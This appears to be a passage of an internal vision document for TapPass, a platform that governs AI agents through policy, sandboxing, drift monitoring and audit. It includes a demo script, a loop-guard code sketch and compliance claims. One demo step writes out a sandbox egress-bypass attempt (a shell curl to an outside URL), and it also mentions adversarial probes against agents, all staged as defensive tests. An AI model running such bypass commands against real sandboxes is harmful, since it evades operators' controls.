  5. Live policy change (Q12). Operator: tappass policy apply --level project=collibra-eval policies/strict.rego. tappass-agent watch shows policy_version: 17 → 18. Tool list shrinks. No agent restart.
  6. Loop detection (Q3). run-task clean-up-temp-assets. After 3 deletes, loop_guard kills the session.
  7. Drift detection (Q12). Run a probe sequence that mimics a drifted prompt template. Dashboard alert: "tool-call distribution shifted from baseline."
  8. Bypass attempt (Q9). tappass-host shell tenant_a; curl https://collibra.com/... → blocked at kernel.
  9. Sync security (Q13). python -c "from tappass_agent import Client; Client(...).request_more_scopes()" → AttributeError.
  10. Revocation (Q14). tappass sandbox revoke tenant_a → next prompt gets 401 sandbox_revoked.
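Step 6 can be sketched as a per-session sliding-window counter over destructive calls. This sketch lets three delete_* calls through within a window and kills the session on the next one. The window length, the exact boundary, the delete_* prefix heuristic, and the `LoopGuard` class are all assumptions, because this document doesn't specify the actual loop_guard step's rules.

```python
import time
from collections import deque


class SessionKilled(RuntimeError):
    """Raised when loop_guard terminates the session."""


class LoopGuard:
    """Per-session guard against repeated destructive tool calls (hypothetical sketch)."""

    def __init__(self, max_calls: int = 3, window_s: float = 60.0, clock=time.monotonic):
        self.max_calls = max_calls
        self.window_s = window_s
        self._clock = clock
        self._recent: deque = deque()  # timestamps of recent destructive calls
        self.killed = False

    def check(self, tool_name: str) -> None:
        """Call before each tool call; raises SessionKilled to stop the session."""
        if self.killed:
            raise SessionKilled("session already terminated by loop_guard")
        if not tool_name.startswith("delete_"):  # assumed 'destructive' heuristic (delete_*)
            return
        now = self._clock()
        while self._recent and now - self._recent[0] > self.window_s:
            self._recent.popleft()  # forget calls that fell out of the window
        self._recent.append(now)
        if len(self._recent) > self.max_calls:
            self.killed = True
            raise SessionKilled(f"{len(self._recent)} destructive calls within {self.window_s:.0f}s")
```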

| Shape | Task | Layers exercised | Maps to function |
|---|---|---|---|
| Customer-support emailer | gmail.send replies | gateway, mcp, harness | customer_support_emailer |
| Code reviewer | gh PR comments | gateway, mcp, kernel | code_reviewer |
| Internal knowledge assistant | RAG over internal docs | gateway, mcp | internal_kb_assistant |
| Data engineer agent | SQL against analytics DB | gateway, mcp, codemode, kernel | data_engineer_agent |
| Refund processor | Stripe partial refunds | gateway, mcp, harness | refund_processor |
| Collibra steward (§15.1) | Catalog modifications | all five | (custom) |

Each is a small repo depending only on tappass-agent. None requires changes to TapPass core.


| Alternative | Why this concept is more than that |
|---|---|
| OPA standalone | OPA evaluates policy. Doesn't compile a Compiled Policy, deliver signed updates, or live alongside the agent at every enforcement position. We use OPA inside TapPass. |
| Auth0 (any IDP) | IDPs issue identity tokens to users. Don't derive aspect-organized Compiled Policies, don't push live updates, don't understand MCP. Mental model rhymes; primitives don't. |
| Service mesh (Istio, Linkerd) | Network-layer policy only: that's our kernel ring, one of five enforcement positions. Customers can keep their mesh; we slot above it. |
| Provider-side limits (Anthropic, OpenAI) | Coarse and per-key. No agent / session / resource concepts. Lock the customer to one provider. |
| Per-vendor governance (each SaaS) | Reproduces the problem: customer manages N governance UIs across N products. |
| Black-box red-teaming only (Giskard-style) | Pre-deployment evaluation is necessary but insufficient, since it doesn't enforce at runtime. We do both: §8 evaluation + §9–13 enforcement. |
| Build it yourself, per agent | What every agent vendor otherwise has to do. Whole pitch is "don't." |

Unique contribution: an aspect-organized Compiled Policy derived from one Rego source (across an org / project / agent cascade), evaluated against an adversarial probe suite before deployment, delivered by signed unidirectional sync at runtime, drift-monitored in production, rendered into native config by per-target providers across 3 rings + 2 cross-cutting layers — all model-provider-agnostic.


What customers ask before architecture matters. Where data lives, what's never used for training, certifications, encryption, residency.

EU buyers (Collibra, regulated industries, public sector) and US enterprise CISOs filter on these properties before the architecture conversation even begins. Stating them explicitly is part of the procurement-defensibility story.

  • 0-training policy. Customer prompts, completions, tool calls, audit data, and policy content are never used to train any model, whether TapPass-internal or third-party. Provider keys, when used via BYOK, are passed through to the provider; the customer's contract with that provider governs how the provider handles the traffic.
  • Customer data residency. Two regions at GA: EU (Ireland) and US (Virginia). Policy + audit + Compiled Policy compilation happens in-region. No cross-region data transfer except where the customer's own model provider routes it.
  • Encryption at rest. AES-256 (KMS-envelope; per-org AAD per feedback_byok_llm_keys).
  • Encryption in transit. TLS 1.3 between every component. Sync channel uses mTLS with Ed25519 signing.
  • Customer data deletion. Right-to-erasure honored within 30 days. Audit records sealed at session close (hash-chained); deletion replaces with tombstones rather than gaps to preserve chain integrity.
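Tombstones preserve chain integrity if the chain is built over each record's content hash rather than over the content itself. Erasure then deletes the payload but keeps its hash, so every link still verifies. Here is a sketch of that construction. It assumes SHA-256 and a hypothetical `AuditRecord` layout with hypothetical `append`, `erase`, and `verify` helpers; the actual sealing format is not specified here.

```python
from __future__ import annotations

import hashlib
import json
from dataclasses import dataclass

GENESIS = "0" * 64


def _h(data: str) -> str:
    return hashlib.sha256(data.encode()).hexdigest()


@dataclass
class AuditRecord:
    payload: dict | None  # None once erased: the tombstone
    payload_hash: str     # kept forever, even after erasure
    chain_hash: str       # H(previous chain_hash + payload_hash)


def append(chain: list[AuditRecord], payload: dict) -> None:
    prev = chain[-1].chain_hash if chain else GENESIS
    payload_hash = _h(json.dumps(payload, sort_keys=True))
    chain.append(AuditRecord(payload, payload_hash, _h(prev + payload_hash)))


def erase(chain: list[AuditRecord], index: int) -> None:
    """Right-to-erasure: drop the content, keep the hash, leaving a tombstone rather than a gap."""
    chain[index].payload = None


def verify(chain: list[AuditRecord]) -> bool:
    prev = GENESIS
    for rec in chain:
        if rec.payload is not None and _h(json.dumps(rec.payload, sort_keys=True)) != rec.payload_hash:
            return False  # live content was altered
        if _h(prev + rec.payload_hash) != rec.chain_hash:
            return False  # a link was altered, removed, or reordered
        prev = rec.chain_hash
    return True
```

Erasing record 1 leaves `verify` true. Deleting record 1 outright, or editing a surviving payload, makes it false.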

| Certification | Status | Target |
|---|---|---|
| SOC 2 Type 1 | Roadmap | 2026 H2 (kicks off after architectural spine ships) |
| SOC 2 Type 2 | Roadmap | 2027 H1 |
| GDPR (Article 28 DPA, Article 30 records, DPIA template) | Operational today; trust center has DPA/DPIA/subprocessors | Maintain |
| EU AI Act readiness | Compliance pack ships with this concept (§4.5); audit and risk management aligned to the requirements of Articles 9–17 | Maintain |
| ISO 27001 | Roadmap | 2027 |
| HIPAA BAA | On request, evaluated case-by-case | (depends on customer demand signal) |

17.3 Sub-processor and supply-chain disclosure

  • Trust center (trust.tappass.ai) lists every sub-processor (cloud provider, model providers when BYOK isn't used, observability vendors).
  • Every TapPass repo carries an OSS_COMPLIANCE.md mapped to OpenChain ISO/IEC 5230 (per project_oss_license_compliance.md).
  • liccheck + CycloneDX SBOM gates ship in CI for every repo.
  • Logical isolation per org. Per-org AAD on KMS-envelope encryption; per-org policy store; per-org sandbox Compiled Policies cannot cross-read (separate namespaces, separate UIDs, separate sync channels).
  • No shared compute path between tenants. Pipeline execution is per-call and stateless; no in-memory caches that span tenants beyond the per-org cache.
  • Audit cross-tenant isolation. An auditor in org A cannot query org B's audit records. This is enforced both by transport (separate org_id scoping at the pipeline boundary) and by RBAC.
  • Status page at status.tappass.ai.
  • Public incident database (planned). A RealHarm-equivalent — TapPass-curated catalog of agent failure modes observed across deployments (anonymized), so the broader community can learn from real-world failures. Marketing/community asset; not a product feature.

★★★ blocks the spec, ★★ shapes it, ★ nice-to-have.

  1. ★★★ Multi-machine identity. One enrollment, one sandbox? Confirm vs. customer expectations.
  2. ★★★ tappass-host vs. tappass exec packaging. Separate package, shared core. Confirm during spec.
  3. ★★★ Cascade merge edge cases. Org floor changes after agents are running — re-derive or wait? Project policy contradicts org floor — reject at apply time? Lean: re-derive on any change; reject contradictions at apply. Confirm during spec.
  4. ★★★ Compliance pack maintenance ownership. EU AI Act content evolves; OWASP Top 10 updates yearly. Who owns the bundles? Lean: Compliance team (Product) curates; Engineering reviews technical claims; Legal reviews regulatory mapping. Quarterly review cadence.
  5. ★★★ Pre-deployment evaluation as gate or advisory. Do we require a pass before sandbox-spec emit-bootstrap (block on failure) or report and let the operator decide? Lean: configurable per cascade level — org admin can require eval-pass at org floor for high-risk functions; advisory by default.
  6. ★★ Capability-token authoring UX. Presets vs. raw Rego. Lean: presets first.
  7. ★★ In-flight calls during a policy_version flip. Lean: in-flight completes against old, next uses new.
  8. ★★ Real Collibra MCP roadmap. Confirm with Nick.
  9. ★★ Audit story for layer-disabled sandboxes. Dashboard must show which defenses are not active per sandbox.
  10. ★★ Drift signal sensitivity tuning. Per-sandbox baselines drift naturally — alerting threshold needs care to avoid noise. Lean: per-pack defaults + operator override.
  11. ★ Codemode applicability. The interpreter ring is a no-op for ReAct agents. First-class for code-writing agents.
  12. ★ Pricing/packaging signal. Layered defense + evaluation + compliance packs is more product than chokepoint. Worth a pricing conversation.
  13. ★ Public threat-intelligence asset. RealHarm-equivalent. Marketing, not architecture.

This document is the architectural anchor (vision). Per-piece scope lives at ../components/ — one file per buildable unit, self-contained for subagent dispatch. Two cuts of the same set:

  • Question view (../components/README.md) — components nested by the question they answer (Q3, Q4, Q9, Q10, …).
  • Systems view (../components/SYSTEMS.md) — components grouped by engine (Policy engine, Tool governance engine, Sandbox runtime, Sync system, Operator surfaces, Evaluation engine, Reference implementations, Trust & compliance).

Each component file carries: frontmatter (status, size, owner, dependencies, acceptance criteria), a vision pointer back to this concept, a functional spec, technical design, definition of done, coordination notes, and out-of-scope. A subagent dispatched to "implement X" opens its component file and has everything in one place.

Four specs are the natural deliverables, mapped to the question groupings:

  • tappass-compiled-policy-and-sync.md — policy compiler (with cascade merge) + signed push channel + drift monitor. Answers Q10–Q13.
  • tappass-mcp-proxy.md — MCP-forward + per-org MCP registry + new pipeline steps. Answers Q3, Q7.
  • tappass-clis.md — three CLIs in detail with --level cascade flag, shared OpenShell core. Answers Q14.
  • tappass-evaluation-and-packs.md — pre-deployment evaluation harness + compliance pack scaffolding. Answers Q4 + Q8.

Roadmap and sequencing live at ../roadmap/2026-h2.md.

tappass/collibra-agent (§15.1) — scaffolded once the relevant specs land. Subsequent agents per §15.2 as customer / partner conversations surface.

Trust posture program (SOC 2 Type 1 audit + public trust page expansion) runs in parallel — see ../components/operational/.

This document is the vision; the components are the buildable scope; the roadmap is the time-bound delivery plan; the decisions log (when populated) records why we chose what we chose.